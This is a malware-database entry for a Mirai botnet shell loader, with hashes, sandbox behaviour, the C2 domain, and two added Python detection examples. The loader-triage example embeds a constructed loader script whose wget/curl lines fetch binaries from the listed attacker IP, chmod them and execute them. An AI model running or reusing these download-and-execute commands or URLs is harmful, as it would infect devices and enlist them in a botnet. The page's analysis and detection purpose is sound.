MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai
Vendor detections: 9

SHA256 hash: bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1
SHA3-384 hash: d2112e9e6921628fa04a4a06345bba9a9e9d41cc38b9cd9683cfb77ef445ad16aaec2b5c81cc7854eb5b9312d147557d
SHA1 hash: 7af00945bea835e2da8fbfb809de34b62b9c6e45
MD5 hash: b117bb31f1f546a91ec8edb569dda676
humanhash: victor-winter-helium-fillet
File name: nullnet_bash.sh
Signature: Mirai
File size: 3'825 bytes
First seen: 2026-03-27 15:22:08 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 96:vfIGIBfIPIXfIcIlfIKIBfIlITnfI+IhfIrIjfIvI5fIwINfIDIBfIkItfIG7IGl:XD4Q6P8rYSmf5scCCQ/o2oRUpUKeSi8l
TLSH: T150813DC81330C7327DA28526A1B95AE433C495D355EB8FE1B2F73F619848E1C39A4B91
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: BlinkzSec
Tags: mirai
URL | Malware sample (SHA256 hash) | Signature | Tags
http://144.172.105.56/nullnet_bin_dir/nullnet_load.x86 | 1a675737eab617a53c0eea787c995662598d1457ce99efbe306b7d8d28e4d372 | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.mips | e06a96e238b0c2c4a72bde8f3f7cd8920fcbb539ae760c110740d8a6c1232c1b | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.mpsl | ba14f0deb074738b8e93d2beed1f72ee65d54f2f41a3b78e7777e0e2e50ab00e | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm | 625e2ef515c656e7cb5ec6440df58e8e545b55dada1934b24d3c8ae3e767253b | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm5 | ab92589347b1cb5262aef0b60976352968e012223132d0878d1596fd59acd2e7 | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm6 | 94234c40137032359b856140b970d2120a8acb50d64e2d5cbb4779b5ca7413da | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm7 | 919f83adf548667693bf9056dd14555fcc64b7a855ed4bc1fae0712be2aedc20 | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.ppc | 8c415a0b9279fc7a5cb72c0fddfe0be53d9da8c092edd55479b8b04ac468f553 | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.m68k | 1ac41c59155b3e13a8af681ba363b5968162195aeec2c10ea5fae43a9f4c02fb | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.sh4 | e65da4625748cb6612837f05e19d3a998fac626075f1c15dd5a945421b85ac90 | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.spc | a20e6b829c391c825949fd971f863ec9d654095db1e1ad5cfe2f05f7d25ee6bc | Mirai | elf mirai ua-wget
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arc | 205c5c526bf121543297c619245d43c983a34626cd96c7100525fbce6b4867ba | Mirai | mirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.x86_64 | b9ff5b1a87001fc513ca0526b5734b1925bdb673f3ed159a36bf6d078e453d5d | Mirai | elf mirai ua-wget
http://144.172.105.56/nullnet_bin_dir/nullnet_load.i686 | bcf5aa14d139a865aa901f48c665139971a00918a699f4179bd4c468868d04da | Mirai | elf mirai ua-wget
http://144.172.105.56/nullnet_bin_dir/nullnet_load.i486 | 4897019f7d7f09bba05c9cb7eb9215c0cad257b1840ea752cbc90fae3b2fb720 | Mirai | elf mirai ua-wget

Intelligence

File Origin
# of uploads: 1
# of downloads: 42
Origin country: GB

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: medusa mirai

Result: Gathering data

Status: terminated
Behavior Graph (process and network relationships recovered from the sandbox graph; the rendered image is not reproduced here):
  /usr/bin/sudo (pid 1970) execve /tmp/sample.bin (pid 1975), the script under analysis
  /tmp/sample.bin runs eight download-and-execute cycles; each runs /usr/bin/wget and then /usr/bin/curl (net, send-data, write-file), /usr/bin/chmod, a cloned /usr/bin/bash, and execve /tmp/loudscream (net); /usr/bin/cat runs once before the first chmod
  wget/curl targets: 144.172.105.56:80 in the first cycle (161 B and 110 B sent), bitches.gunna.pro:80 in every later cycle (162 B and 111 B sent in the next two cycles, connect only afterwards)
  each /tmp/loudscream instance clones a worker flagged dns net send-data zombie, which queries 8.8.8.8:53 (35 B, later 70 B) and contacts bitches.gunna.pro:1420 (16 B sent in the first two instances, connect only afterwards)
  from the second instance on, /tmp/loudscream also connects to 0.0.0.0:61420 (local)
  each worker clones two scanner children flagged net net-scan send-data; one sends 40 B to 34.8.177.193:23 (telnet), and across the run the scanner children push data to 320, 640, 800, 1280, 1600, 2509, 2720, 4096 and 4097 IP addresses each ("review logs to see them all")
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2026-03-27 15:20:18 UTC
File Type: Text (Shell)
AV detection: 21 of 36 (58.33%)
Threat level: 3/5

Result
Malware family:
Score: 10/10
Tags: family:mirai botnet:ecchi antivm botnet credential_access defense_evasion discovery linux upx
Behaviour:
  Reads runtime system information
  System Network Configuration Discovery
  Writes file to tmp directory
  Changes its process name
  Checks CPU configuration
  Reads system network configuration
  Reads process memory
  UPX packed file
  Enumerates active TCP sockets
  Enumerates running processes
  File and Directory Permissions Modification
  Executes dropped EXE
  Modifies Watchdog functionality
  Contacts a large (50075) amount of remote hosts
  Creates a large amount of network flows
  Mirai
  Mirai family
Malware Config
C2 Extraction: bitches.gunna.pro

Please note that we are no longer able to provide a coverage score for VirusTotal.
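The sandbox trace above is dominated by /tmp/loudscream workers pushing data to 34.8.177.193:23 and then to thousands of further addresses, which is Mirai's telnet scanner at work. On a real network the payload is invisible, but a flow log (Zeek conn.log, NetFlow) still carries the signal: one source touching many distinct hosts on tcp/23 or tcp/2323 inside a short window. The Python below is an added example, not MalwareBazaar's, the sandbox vendor's or the botnet's code; the flow records, the 10.0.0.x hosts and the 198.51.100.7 stand-in for the C2 are constructed, and the 50-target / 60-second threshold is an assumed tuning value.

```python
"""Telnet scan-burst detection over flow records (added example)."""
from collections import deque

TELNET_PORTS = {23, 2323}      # Mirai scans 23, and 2323 at a lower rate
SCAN_THRESHOLD = 50            # distinct targets per window; assumed tuning value
WINDOW_SECONDS = 60.0


def parse_conn_line(line: str):
    """Parse a whitespace-separated 'ts src dst dport proto' record
    (the subset of Zeek conn.log fields the detector needs)."""
    ts, src, dst, dport, proto = line.split()
    return float(ts), src, dst, int(dport), proto


def detect_telnet_scanners(records, threshold=SCAN_THRESHOLD, window=WINDOW_SECONDS):
    """Return {src: (alert_ts, distinct_targets)} for every source that reached
    at least `threshold` distinct hosts on telnet ports within `window` seconds.
    Sliding window per source; state is bounded by the flows inside the window."""
    recent = {}      # src -> deque[(ts, dst)] still inside the window
    live = {}        # src -> {dst: flows to it inside the window}
    alerts = {}
    for ts, src, dst, dport, proto in sorted(records):
        if proto != "tcp" or dport not in TELNET_PORTS:
            continue
        q = recent.setdefault(src, deque())
        counts = live.setdefault(src, {})
        q.append((ts, dst))
        counts[dst] = counts.get(dst, 0) + 1
        while q and ts - q[0][0] > window:          # expire flows older than the window
            _, old = q.popleft()
            counts[old] -= 1
            if not counts[old]:
                del counts[old]
        if len(counts) >= threshold and src not in alerts:
            alerts[src] = (ts, len(counts))
    return alerts


def build_sample_log():
    """Constructed flow log: two benign hosts and one infected host that talks
    to its C2 port and then sweeps 200 distinct addresses on tcp/23 in 20 s."""
    lines = [
        "1000.0 10.0.0.5 203.0.113.10 443 tcp",       # workstation, HTTPS
        "1001.0 10.0.0.9 10.0.1.1 23 tcp",            # admin host, three switches
        "1002.0 10.0.0.9 10.0.1.2 23 tcp",
        "1003.0 10.0.0.9 10.0.1.3 23 tcp",
        "1010.0 10.0.0.23 198.51.100.7 1420 tcp",     # same C2 port the sandbox saw
    ]
    lines += [f"{1011.0 + i * 0.1:.1f} 10.0.0.23 203.0.113.{i + 1} 23 tcp"
              for i in range(200)]
    return lines


def run(lines=None):
    """Detect scanners in the given log lines (defaults to the constructed log)."""
    return detect_telnet_scanners(parse_conn_line(l) for l in (lines or build_sample_log()))


if __name__ == "__main__":
    for src, (ts, n) in run().items():
        print(f"{src}: {n} distinct telnet targets inside {WINDOW_SECONDS:.0f}s at t={ts}")
```

Mirai's scanner sends raw SYNs, so most of these flows show up as unanswered attempts (Zeek state S0), which is fine: the detector counts destinations, not completed sessions. The sandbox shows single workers reaching 4096 addresses, so a 50-in-60-seconds cut-off fires within seconds of infection; tune it against your own admin jump hosts and vulnerability scanners, which this constructed log models with 10.0.0.9. The C2 port (1420) is not generically detectable this way, so pair the scan rule with a blocklist of the page's IOCs (bitches.gunna.pro, 144.172.105.56).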

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic approach to shellscript downloaders

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
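The second rule's description names a technique rather than a string: fetch from a numeric IP, chmod, execute, repeated per architecture. The Python below is an added example (not MalwareBazaar's, the rule authors' or the loader's own code) that implements the same technique-based triage outside YARA, so each indicator can be inspected separately. SAMPLE_SCRIPT is a constructed loader built from this page's own download URLs and the /tmp/loudscream name seen in the sandbox, arranged the way such loaders usually are; it is not the content of nullnet_bash.sh. BENIGN_SCRIPT is a constructed control, and the "three or more architectures" cut-off is an assumption.

```python
"""Technique-based triage of a shell-script botnet loader (added example)."""
import re
from dataclasses import dataclass, field

# Per-architecture build suffixes, taken from the nullnet_load.* URLs on this page.
ARCH_SUFFIXES = {"x86", "x86_64", "i486", "i686", "mips", "mpsl", "arm", "arm5",
                 "arm6", "arm7", "ppc", "m68k", "sh4", "spc", "arc"}

NAME = r"([^\s;|&'\"()]+)"                      # one shell word, stopped at separators
URL_FROM_IP = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/" + NAME)
DOWNLOADER = re.compile(r"(?:^|[\s;|&(])(?:wget|curl|tftp|ftpget)\s")
OUTPUT_FILE = re.compile(r"\s-[oO]\s*" + NAME)  # wget -O name / curl -o name
CHMOD_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\s+" + NAME)
RUN_RELATIVE = re.compile(r"(?:^|[\s;|&])\./" + NAME)
REMOVE = re.compile(r"\brm\s+(?:-\w+\s+)*" + NAME)


@dataclass
class LoaderReport:
    ip_hosts: set = field(default_factory=set)   # numeric-IP download hosts
    urls: list = field(default_factory=list)
    arches: set = field(default_factory=set)     # architecture suffixes requested
    dropped: set = field(default_factory=set)    # local names written by wget/curl
    chmodded: set = field(default_factory=set)
    executed: set = field(default_factory=set)
    removed: set = field(default_factory=set)

    @property
    def download_chmod_exec(self) -> set:
        """Names that are fetched, made executable and run: the loader core."""
        return self.dropped & self.chmodded & self.executed

    @property
    def verdict(self) -> str:
        if self.ip_hosts and self.download_chmod_exec:
            # three or more architectures is an assumed cut-off for "multi-arch"
            return "multi-arch-botnet-loader" if len(self.arches) >= 3 else "downloader"
        return "benign-or-unknown"


def analyse(script: str) -> LoaderReport:
    r = LoaderReport()
    for raw in script.splitlines():
        line = raw.split("#", 1)[0]              # drop comments; crude but adequate here
        for m in URL_FROM_IP.finditer(line):
            r.ip_hosts.add(m.group(1))
            r.urls.append(m.group(0))
            suffix = m.group(2).rsplit(".", 1)[-1]
            if suffix in ARCH_SUFFIXES:
                r.arches.add(suffix)
        if DOWNLOADER.search(line):
            names = OUTPUT_FILE.findall(line)
            # without -o/-O the tool keeps the remote basename
            names = names or [m.group(2).rsplit("/", 1)[-1] for m in URL_FROM_IP.finditer(line)]
            r.dropped.update(names)
        r.chmodded.update(CHMOD_EXEC.findall(line))
        r.executed.update(RUN_RELATIVE.findall(line))
        r.removed.update(REMOVE.findall(line))
    return r


# Constructed stand-in: this page's download URLs and the dropped name seen in the
# sandbox, laid out the way Mirai loaders usually are. Not nullnet_bash.sh itself.
SAMPLE_SCRIPT = """#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://144.172.105.56/nullnet_bin_dir/nullnet_load.x86 -O loudscream || curl -s http://144.172.105.56/nullnet_bin_dir/nullnet_load.x86 -o loudscream; chmod 777 loudscream; ./loudscream nullnet
wget http://144.172.105.56/nullnet_bin_dir/nullnet_load.mips -O loudscream || curl -s http://144.172.105.56/nullnet_bin_dir/nullnet_load.mips -o loudscream; chmod 777 loudscream; ./loudscream nullnet
wget http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm7 -O loudscream || curl -s http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm7 -o loudscream; chmod 777 loudscream; ./loudscream nullnet
wget http://144.172.105.56/nullnet_bin_dir/nullnet_load.x86_64 -O loudscream || curl -s http://144.172.105.56/nullnet_bin_dir/nullnet_load.x86_64 -o loudscream; chmod 777 loudscream; ./loudscream nullnet
rm -rf loudscream
"""

# Constructed control: hostname-based installer, no chmod-and-run of a numeric-IP download.
BENIGN_SCRIPT = """#!/bin/sh
curl -fsSL https://example.com/install.sh -o install.sh
sh install.sh
rm -f install.sh
"""

if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_SCRIPT), ("control", BENIGN_SCRIPT)):
        rep = analyse(script)
        print(label, rep.verdict, sorted(rep.arches), sorted(rep.download_chmod_exec))
```

The verdict deliberately requires the full chain (numeric-IP fetch, chmod, relative execution of the same name) rather than any one indicator, which is what keeps installer scripts and package post-install hooks out of the alert queue. The gap is the same one the YARA rule has: the sandbox trace shows the script also pulling from bitches.gunna.pro:80, a hostname, so a numeric-IP-only URL pattern misses that stage; widen URL_FROM_IP to hostnames if you need it, at the cost of more benign hits. Loaders that iterate over architectures with a shell for-loop and a variable need the loop's token list extracted instead of per-line URLs.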

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Distributed via web download
Web download | Mirai | sh | bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1 (this sample)